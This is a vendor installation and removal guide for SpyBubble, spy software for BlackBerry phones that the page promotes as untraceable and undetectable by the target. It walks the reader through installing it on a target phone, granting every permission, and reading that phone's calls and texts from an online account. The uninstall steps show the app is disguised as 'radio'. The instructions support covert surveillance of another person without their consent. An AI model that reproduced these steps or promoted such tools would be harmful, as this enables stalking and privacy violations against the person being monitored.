Tablet PC, iPad Monitoring and
If you are already a client of SpyBubble, after installing the program, go here to get the information you want right away http://cp.spybubble.com/userlogin.php. You’ll need the username and password that you created when you opened an account with us. If you forgot your password, go here: http://cp.spybubble.com/forgotpass.php
If you haven’t created an account with us, go here to get one right now: http://spybubble.com/register.php.
Remember, SpyBubble is the Blackberry spy software that is completely untraceable and undetectable by the target. We know that the information that you are looking for is extremely sensitive and that’s why we went to great lengths to test our software in every circumstance imaginable in order to make sure that you have an extremely effective and completely discreet tool at your disposal.
Note: You do not need to connect your phone to your computer to install SpyBubble on it.
1. Open the Web Browser on your BlackBerry and type in the following address EXACTLY as shown, then press Enter:
2. Check the Enable Application Permissions box as shown below, then click on the Download button.
3. The next screen will ask you to allow changes to the application control permissions.
4. When you get the Permissions screen, change all items in all three categories to Allow . Then click your Menu button and go to Save as shown below.
5. After changing the setting the permission settings, the download process will start as shown below.
6. You will then see an alert box related to Application Permission as shown. Click on Yes button here.
If you do not see the Step 6 or Step 7 screens, click the End Call key to go back to the home screen, pull out the battery, and restart the phone and repeat from Step 1 again.
7. Click on I Accept button to accept the TERMS AND CONDITIONS. Click here if you have closed this screen by any chance.
8. Lastly, you need to register your license key. Enter your license key and click on Submit button.
Please note that you may have to wait for few seconds after clicking on the submit button before you see the successful message.
Please note that if you do not see the success or failure message even after few mins, there may be chance that the target phone does not have right GPRS access point defined (APN). Go to Option -> Advance Options -> TCP and check if the settings are correct.
You are now ready to use SpyBubble. Call the phone and send some messages as a text. Logs will start showing in your online account after a few minutes. To check that the calls and texts are being registered, log into the system from any computer with Internet access: http://cp.spybubble.com/userlogin.php.
To remove SpyBubble from the BlackBerry, follow the below steps.
1. Click on the Options menu.
2. Click on the Applications menu.
3. This page includes all the installed Applications. Click on radio in the menu to remove it from the BlackBerry as shown below.
4. When you click on the menu button to delete radio from the phone, there will be a delete sub menu. Click on Delete as shown below.
5. The next screen will ask you to confirm deletion. Click on Delete .
6. The deletion process will take effect after restarting your phone. Click on Yes.